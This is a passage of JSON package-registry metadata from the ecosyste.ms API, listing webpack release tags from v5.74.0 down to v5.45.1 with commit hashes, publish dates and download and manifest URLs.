purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/G